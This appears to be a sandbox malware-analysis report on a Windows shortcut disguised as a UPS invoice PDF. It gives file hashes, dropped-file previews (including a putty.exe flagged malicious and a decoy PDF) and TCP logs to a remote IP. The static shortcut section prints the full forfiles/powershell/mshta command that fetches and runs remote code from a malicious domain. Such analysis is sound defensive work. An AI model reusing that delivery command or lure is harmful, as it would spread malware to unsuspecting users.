                    SHA-512:86704C6A2208A521C3013955BE064B9CC666FE776E3C13C0B307264205C640CDE80EB7D9D4C773A24124D9CC656708F6C3D1272F66528DC7B582C42BE8F1AC71
                    Malicious:false
                    Preview:05-10-2023 10:18:29:.---2---..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 10:18:29:.Closing File..05-10-

                    C:\Users\user\AppData\Local\Temp\acrocef_low\2296b743-f1e4-4b7e-aa89-9bba3ba71b77.tmp

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                    Category:dropped
                    Size (bytes):1419751
                    Entropy (8bit):7.976496077007677
                    Encrypted:false
                    SSDEEP:24576:/rwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TwZG6bWLxBGZN3mlind9i4ufFXpAXkru
                    MD5:95F182500FC92778102336D2D5AADCC8
                    SHA1:BEC510B6B3D595833AF46B04C5843B95D2A0A6C9
                    SHA-256:9F9C041D7EE1DA404E53022D475B9E6D5924A17C08D5FDEC58C0A1DCDCC4D4C9
                    SHA-512:D7C022459486D124CC6CDACEAD8D46E16EDC472F4780A27C29D98B35AD01A9BA95F62155433264CC12C32BFF384C7ECAFCE0AC45853326CBC622AE65EE0D90BA
                    Malicious:false
                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                    C:\Users\user\AppData\Local\Temp\acrocef_low\5d5f29c8-a0f8-4f82-8f03-8cb59a107c71.tmp

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                    Category:dropped
                    Size (bytes):758601
                    Entropy (8bit):7.98639316555857
                    Encrypted:false
                    SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                    MD5:3A49135134665364308390AC398006F1
                    SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                    SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                    SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                    Malicious:false
                    Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                    C:\Users\user\AppData\Local\Temp\acrocef_low\99d592b2-fbd8-49af-b668-7ecf38b8561c.tmp

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                    Category:dropped
                    Size (bytes):386528
                    Entropy (8bit):7.9736851559892425
                    Encrypted:false
                    SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                    MD5:5C48B0AD2FEF800949466AE872E1F1E2
                    SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                    SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                    SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                    Malicious:false
                    Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                    C:\Users\user\AppData\Local\Temp\acrocef_low\e39e21f4-e07d-4400-a1ba-6bade7ec787f.tmp

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
                    Category:dropped
                    Size (bytes):1407294
                    Entropy (8bit):7.97605879016224
                    Encrypted:false
                    SSDEEP:24576:/I+wYIGNP4bdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07mWL07oXGZd:LwZG6b3mlind9i4ufFXpAXkrfUs0CWLk
                    MD5:F5279DA3659F1FDF155BE793A409106A
                    SHA1:B389FCDB8832ABD4BC4A06CB7E97107FC5E139EA
                    SHA-256:4926C6879266E3E2301A1823FE1FF8772B1FA7A33163224B1B5C2695A0E372CA
                    SHA-512:07CA1BF523F22967695DF263E7477135C69F5B9F6B612B8037F9434C099F5BE132957DAC9619F13F97FDDD6A543E78D395755F7BB644B34D864C46239F7DDAD6
                    Malicious:false
                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                    C:\Users\user\AppData\Roaming\putty.exe

                    Download File
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):1663264
                    Entropy (8bit):6.929148215184974
                    Encrypted:false
                    SSDEEP:49152:Plp9tHfYoEaTSiz23THT3WSMpDgF/qB0Rj6KIeVSc/zui+:PX/LEQkF/qBk6K2c/ii+
                    MD5:5EFEF6CC9CD24BAEEED71C1107FC32DF
                    SHA1:3CFC9764083154F682A38831C8229E3E29CBE3EF
                    SHA-256:E61B8F44AB92CF0F9CB1101347967D31E1839979142A4114A7DD02AA237BA021
                    SHA-512:CECD98F0E238D7387B44838251B795BB95E85EC8D35242FC24532BA21929759685205133923268BF8BC0E2DED37DB7D88ECBE2B692D2BE6F09C6D92A57D1FDAC
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."............................@....................................q ....`..................................................H..........@.......8m...... W...................................=..(...0...@............S...............................text...V........................... ..`.rdata..\...........................@..@.data....U..........................@....pdata..8m.......n..................@..@.00cfg..8...........................@..@.gxfg...`*.......,..................@..@.tls.................:..............@..._RDATA..\............<..............@..@.rsrc...@............>..............@..@.reloc........... ..................@..B........................................................................................................................................................................................................................

                    C:\Users\user\AppData\Roaming\upsinvoice.pdf

                    Download File
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:PDF document, version 1.5, 1 pages (zip deflate encoded)
                    Category:dropped
                    Size (bytes):93556
                    Entropy (8bit):7.934411024179904
                    Encrypted:false
                    SSDEEP:1536:kKawmpcJxPhIUQR0iIN8oyG34uOqNckssvhi0Z3T9ADkkzgyMr2SSjW:kppSPhIUcIN4Is+i0tXyDS4W
                    MD5:3C93073ACD357CA95D13F097621CC38D
                    SHA1:566A4F6A4B23CD5CE56BB5F33FD7B411FC0205BF
                    SHA-256:ED8753A4B9351239ADE1B941E01897CDBF1928A788C194EAC468F198C45BD779
                    SHA-512:BADBC9BA9D89A3235919B7E652845940C9CA4C9E547A3219786E598F92973522EF0DD3B17337E2490B0F45544A9A5E45784F6F1AB0C8BF5F8C865D2C50C2967C
                    Malicious:false
                    Preview:%PDF-1.5..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 13 0 R/MarkInfo<</Marked true>>>>..endobj..2 0 obj..<</Type/Pages/Count 1/Kids[ 3 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 8 0 R/F3 10 0 R>>/ExtGState<</GS7 7 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 5611>>..stream..x..][....~_`.C?%3...d.oF. .dG..-[..`.....j.iG.Q.....X.5.Mv.$..aG3.,V.#..{.'/.....7O_<+.........^..=......(^......XQ.E'X9.........v.~V........b....?..=....x...q*.=/.........O[.lvwW....uW.#.Pi]..l|...J.$...^....U..b+6,.f...l........g..o.....#p.../y_t..[Q.+.....}.>?.....=U..).eYG.'5Z./{)..P...~..`M..:M.1<.q.x]....-fjt|%Q~.^..|..Am.2..$mD.-......S.O.m4..-[..2....RXt..6....vJ.+.9.....d._.KOz....6JE[..X..pK...Q.U..VY\.M.a.....gK^.._.%/....mo...x....#...P.]T.../3..~T@

                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                    Download File
                    Process:C:\Windows\System32\svchost.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):55
                    Entropy (8bit):4.306461250274409
                    Encrypted:false
                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                    Malicious:false
                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                    Static File Info

                    General

                    File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Sat Dec 7 08:09:57 2019, mtime=Wed Jun 12 01:24:42 2024, atime=Sat Dec 7 08:09:57 2019, length=41472, window=hidenormalshowminimized
                    Entropy (8bit):4.648076363173948
                    TrID:
                    • Windows Shortcut (20020/1) 100.00%
                    File name:Invoice-UPS-218931.pdf.lnk.mal.lnk
                    File size:1'186 bytes
                    MD5:de45594e6e0700cd245eb48167b4d576
                    SHA1:7903bc25f029d194a31783adb0c26cc461ac2ef2
                    SHA256:d187de197e79e51a82eb727809d5fb6847c75104979ec9622429c2e74b55db5f
                    SHA512:ca2277723575799aa00169dbf3a641ef54d30095196a42a5f32d39dca3b563b0b2094de709387f28c633c388172eade8f60baf74e35a0978ffc4a678b2237167
                    SSDEEP:24:8d59hbIvDlpyAZPkEAc+/41+sPxZDSkaEabCWVIm0l:83YZgebnWkraRVIJl
                    TLSH:2621AB091BEA4B76E3B79F7D58B77A1689397C87ED57DF0D008045484095600E874F3A
                    File Content Preview:L..................F.... ...............o...................................E....P.O. .:i.....+00.../C:\...................V.1......X....Windows.@........OwH.X#^..............................W.i.n.d.o.w.s.....Z.1......Xg...System32..B........OwH.X!_......

                    File Icon

                    Icon Hash:74f0e4e4e4e1e1ed

                    Static Windows Shortcut Info

                    General

                    Relative Path:..\..\..\..\..\Windows\System32\forfiles.exe
                    Command Line Argument:/p C:\Windows /m write.exe /c "powershell . mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage"
                    Icon location:shell32.dll

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jul 2, 2024 12:47:20.437999964 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:20.438055038 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:20.438137054 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:20.448259115 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:20.448282957 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:21.633876085 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:21.633980036 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:21.769401073 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:21.769440889 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:21.769800901 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:21.769870043 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:21.772070885 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:21.812503099 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.165719986 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.165745974 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.165760994 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.165803909 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.165841103 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.165849924 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.165894032 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.167642117 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.167659998 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.167730093 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.167736053 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.167783976 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.287976027 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.288003922 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.288065910 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.288086891 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.288110971 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.288126945 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.289877892 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.289897919 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.289963961 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.289972067 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.290005922 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.291693926 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.291708946 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.291753054 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.291759968 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.291798115 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.293028116 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.293042898 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.293102026 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.293107986 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.293147087 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.410855055 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.410878897 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.410963058 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.410988092 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.411031961 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.411961079 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.411976099 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.412024975 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.412034035 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.412094116 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.412094116 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.413026094 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.413041115 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.413175106 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.413183928 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.413229942 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.414352894 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.414367914 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.414444923 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.414449930 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.414489031 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.415546894 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.415560961 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.415628910 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.415635109 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.415678978 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.416166067 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.416181087 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.416228056 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.416234016 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.416270971 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.416287899 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.416640997 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.416699886 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.416711092 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:22.416750908 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.418101072 CEST49705443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:22.418119907 CEST443497055.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:24.572926998 CEST49708443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:24.572971106 CEST443497085.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:24.573045015 CEST49708443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:24.580090046 CEST49708443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:24.580105066 CEST443497085.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:25.392349958 CEST443497085.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:25.392502069 CEST49708443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:25.394205093 CEST49708443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:25.394221067 CEST443497085.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:25.394479990 CEST443497085.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:25.401614904 CEST49708443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:25.444506884 CEST443497085.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:25.900938034 CEST443497085.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:25.900983095 CEST443497085.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:25.901005030 CEST443497085.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:25.901146889 CEST49708443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:25.901189089 CEST443497085.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:25.901303053 CEST49708443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:25.901803970 CEST443497085.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:25.901830912 CEST443497085.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:25.901885986 CEST49708443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:25.901892900 CEST443497085.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:25.944392920 CEST49708443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:26.021277905 CEST443497085.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:26.021303892 CEST443497085.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:26.021545887 CEST49708443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:26.021574020 CEST443497085.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:26.021629095 CEST49708443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:26.022653103 CEST443497085.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:26.022675037 CEST443497085.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:26.022722960 CEST49708443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:26.022747993 CEST443497085.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:26.022773027 CEST49708443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:26.022797108 CEST49708443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:26.024379969 CEST443497085.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:26.024399042 CEST443497085.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:26.024478912 CEST49708443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:26.024513960 CEST443497085.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:26.024558067 CEST49708443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:26.025300026 CEST443497085.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:26.025366068 CEST443497085.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:26.025376081 CEST49708443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:26.025398016 CEST443497085.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:26.025424004 CEST49708443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:26.025455952 CEST49708443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:26.028547049 CEST49708443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:26.251638889 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:26.251681089 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:26.251856089 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:26.251983881 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:26.251997948 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:27.051975012 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:27.054503918 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:27.054527998 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:27.557420015 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:27.557454109 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:27.557471991 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:27.557535887 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:27.557560921 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:27.557578087 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:27.557661057 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:27.558753014 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:27.558777094 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:27.558850050 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:27.558859110 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:27.600609064 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:27.677634001 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:27.677663088 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:27.677736998 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:27.677757025 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:27.677803040 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:27.677803040 CEST49710443192.168.2.85.188.88.146
